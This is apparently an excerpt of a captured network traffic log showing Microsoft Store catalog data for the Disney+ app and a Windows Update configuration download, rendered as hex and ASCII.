2022-06-08 07:57:05 UTC	9794	IN	Data Raw: 31 34 38 39 33 39 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 39 35 34 31 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 33 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 33 38 30 6c 77 36 43 53 43 31 58 33 69 45 42 72 4c 4e 75 71 66 68 35 2b 4c 63 41 43 74 2f 70 37 46 72 42 52 46 79 77 65 76 70 38 3d Data Ascii: 148939","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":79541,"ForegroundColor":"","Height":300,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"380lw6CSC1X3iEBrLNuqfh5+LcACt/p7FrBRFywevp8=
2022-06-08 07:57:05 UTC	9798	IN	Data Raw: 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 30 33 34 34 31 37 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 32 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 63 63 58 75 6a 62 4c 37 78 78 34 71 74 59 71 55 66 44 53 36 63 7a 70 68 39 53 46 7a 73 57 59 71 4c 79 59 66 35 4a 2f 64 4d 4b 55 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f Data Ascii: r":"transparent","Caption":"","FileSizeInBytes":2034417,"ForegroundColor":"","Height":1080,"ImagePositionInfo":"Desktop/2","ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"ccXujbL7xx4qtYqUfDS6czph9SFzsWYqLyYf5J/dMKU=","Uri":"//store-images.s-microso
2022-06-08 07:57:05 UTC	9802	IN	Data Raw: 2b 20 69 73 20 74 68 65 20 73 74 72 65 61 6d 69 6e 67 20 68 6f 6d 65 20 6f 66 20 79 6f 75 72 20 66 61 76 6f 72 69 74 65 20 73 74 6f 72 69 65 73 2e 20 57 69 74 68 20 75 6e 6c 69 6d 69 74 65 64 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 66 72 6f 6d 20 44 69 73 6e 65 79 2c 20 50 69 78 61 72 2c 20 4d 61 72 76 65 6c 2c 20 53 74 61 72 20 57 61 72 73 20 61 6e 64 20 4e 61 74 69 6f 6e 61 6c 20 47 65 6f 67 72 61 70 68 69 63 2c 20 74 68 65 72 65 27 73 20 61 6c 77 61 79 73 20 73 6f 6d 65 74 68 69 6e 67 20 74 6f 20 65 78 70 6c 6f 72 65 2e 20 57 61 74 63 68 20 74 68 65 20 6c 61 74 65 73 74 20 72 65 6c 65 61 73 65 73 2c 20 4f 72 69 67 69 6e 61 6c 20 73 65 72 69 65 73 20 61 6e 64 20 6d 6f 76 69 65 73 2c 20 63 6c 61 73 73 69 63 20 66 69 6c 6d 73 2c 20 61 6e 64 20 54 56 Data Ascii: + is the streaming home of your favorite stories. With unlimited entertainment from Disney, Pixar, Marvel, Star Wars and National Geographic, there's always something to explore. Watch the latest releases, Original series and movies, classic films, and TV
2022-06-08 07:57:05 UTC	9806	IN	Data Raw: 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 50 61 63 6b 61 67 65 49 64 65 6e 74 69 74 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 22 2c 22 50 75 62 6c 69 73 68 65 72 43 65 72 74 69 66 69 63 61 74 65 4e 61 6d 65 22 3a 22 43 4e 3d 35 38 44 45 43 45 33 39 2d 44 35 44 30 2d 34 32 39 33 2d 41 41 41 30 2d 39 41 46 38 34 38 34 46 31 32 45 32 22 2c 22 58 62 6f 78 43 72 6f 73 73 47 65 6e 53 65 74 49 64 22 3a 6e 75 6c 6c 2c 22 58 62 6f 78 43 6f 6e 73 6f 6c 65 47 65 6e 4f 70 74 69 6d 69 7a 65 64 22 3a 6e 75 6c 6c 2c 22 58 62 6f 78 43 6f 6e 73 6f 6c 65 47 65 6e 43 6f 6d 70 61 74 69 62 6c 65 22 3a 6e 75 6c 6c 7d 2c 22 41 6c 74 65 72 6e 61 74 65 49 64 73 22 3a 5b 7b 22 49 64 54 79 70 65 22 3a Data Ascii: 53FC22B2CE_6rarf9sa4v8jt","PackageIdentityName":"Disney.37853FC22B2CE","PublisherCertificateName":"CN=58DECE39-D5D0-4293-AAA0-9AF8484F12E2","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":
2022-06-08 07:57:05 UTC	9810	IN	Data Raw: 50 4e 22 2c 22 53 58 22 2c 22 53 42 22 2c 22 53 4f 22 2c 22 53 43 22 2c 22 53 4c 22 2c 22 47 53 22 2c 22 53 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 Data Ascii: PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NXQXXLFST89","Properties":{"FulfillmentData"
2022-06-08 07:57:05 UTC	9814	IN	Data Raw: 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 61 72 6d 36 34 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 2c 22 68 65 76 63 50 6c 61 79 62 61 63 6b 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 34 32 39 32 36 35 32 31 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 Data Ascii: tent":null,"PackageFeatures":null}},{"Applications":[{"ApplicationId":"App"}],"Architectures":["arm64"],"Capabilities":["internetClient","privateNetworkClientServer","hevcPlayback"],"ExperienceIds":[],"MaxDownloadSizeInBytes":142926521,"MaxInstallSizeInBy
2022-06-08 07:57:05 UTC	9818	IN	Data Raw: 30 5f 78 38 36 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 30 61 36 65 34 61 30 33 2d 63 39 36 32 2d 38 62 39 64 2d 32 37 34 39 2d 64 35 32 37 38 62 61 34 65 61 38 33 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 31 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 Data Ascii: 0_x86__6rarf9sa4v8jt","PackageId":"0a6e4a03-c962-8b9d-2749-d5278ba4ea83-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.versi
2022-06-08 07:57:05 UTC	9822	IN	Data Raw: 36 34 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 34 65 37 32 33 32 33 32 2d 37 62 36 30 2d 34 66 37 32 2d 39 39 32 35 2d 39 30 32 66 37 35 36 61 38 33 62 32 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 35 7d 2c 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a Data Ascii: 64__6rarf9sa4v8jt\",\"content.productId\":\"4e723232-7b60-4f72-9925-902f756a83b2\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.target\":5},{\"platform.maxVersionTested\":
2022-06-08 07:57:05 UTC	9826	IN	Data Raw: 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 4e 4b 4d 56 42 4c 52 39 58 53 38 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 Data Ascii: "AvailabilityUnifiedApp;3","AvailabilityId":"9NKMVBLR9XS8","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Xbox
2022-06-08 07:57:05 UTC	9830	IN	Data Raw: 72 65 73 20 69 6e 63 6c 75 64 69 6e 67 20 50 72 6f 66 69 6c 65 20 50 49 4e 2c 20 4b 69 64 73 20 50 72 6f 66 69 6c 65 73 2c 20 4b 69 64 2d 50 72 6f 6f 66 20 45 78 69 74 2e 20 41 63 63 6f 75 6e 74 20 68 6f 6c 64 65 72 73 20 63 61 6e 20 63 68 61 6e 67 65 20 61 6e 20 69 6e 64 69 76 69 64 75 61 6c 20 70 72 6f 66 69 6c 65 e2 80 99 73 20 63 6f 6e 74 65 6e 74 20 72 61 74 69 6e 67 20 61 74 20 61 6e 79 20 74 69 6d 65 20 75 6e 64 65 72 20 50 72 6f 66 69 6c 65 20 73 65 74 74 69 6e 67 73 2e 20 5c 72 5c 6e 5c 72 5c 6e 46 6f 72 20 68 65 6c 70 20 77 69 74 68 20 44 69 73 6e 65 79 2b 2c 20 70 6c 65 61 73 65 20 76 69 73 69 74 3a 20 68 74 74 70 3a 2f 2f 68 65 6c 70 2e 64 69 73 6e 65 79 70 6c 75 73 2e 63 6f 6d 2e 5c 72 5c 6e 46 6f 72 20 6f 75 72 20 53 75 62 73 63 72 69 62 65 Data Ascii: res including Profile PIN, Kids Profiles, Kid-Proof Exit. Account holders can change an individual profiles content rating at any time under Profile settings. \r\n\r\nFor help with Disney+, please visit: http://help.disneyplus.com.\r\nFor our Subscribe
2022-06-08 07:57:05 UTC	9834	IN	Data Raw: 69 7a 65 49 6e 42 79 74 65 73 22 3a 38 36 36 35 37 33 37 34 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 33 30 36 30 32 32 34 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 33 30 2e 34 2e 30 5f 61 72 6d 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 66 38 63 Data Ascii: izeInBytes":86657374,"MaxInstallSizeInBytes":123060224,"PackageFormat":"Msix","PackageFamilyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","MainPackageFamilyNameForDlc":null,"PackageFullName":"Disney.37853FC22B2CE_1.30.4.0_arm__6rarf9sa4v8jt","PackageId":"f8c
2022-06-08 07:57:05 UTC	9838	IN	Data Raw: 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 33 30 2e 34 2e 30 5f 61 72 6d 36 34 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 5c 22 Data Ascii: Tested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"Disney.37853FC22B2CE_1.30.4.0_arm64__6rarf9sa4v8jt\"
2022-06-08 07:57:05 UTC	9842	IN	Data Raw: 74 61 72 67 65 74 5c 22 3a 35 7d 2c 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 33 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f Data Ascii: target\":5},{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":false,\"o
2022-06-08 07:57:05 UTC	9846	IN	Data Raw: 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 30 35 32 32 63 37 65 64 2d 31 61 36 33 2d 34 33 61 37 2d 38 37 30 64 2d 33 62 61 33 37 61 34 64 38 39 66 34 22 2c Data Ascii: 2},{\"level\":29,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9NXQXXLFST89","WuBundleId":"0522c7ed-1a63-43a7-870d-3ba37a4d89f4",
2022-06-08 07:57:05 UTC	9848	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:06 UTC	9884	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:06 UTC	9885	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: 49c97906-ee04-40f0-9aaf-78c97aed37fb MS-RequestId: 52723029-5a83-4435-8a73-21e99f6a494e MS-CV: 7zCX44tGG0SyPnwy.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:05 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:06 UTC	9885	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:06 UTC	9901	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
2022-06-08 07:57:06 UTC	9917	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm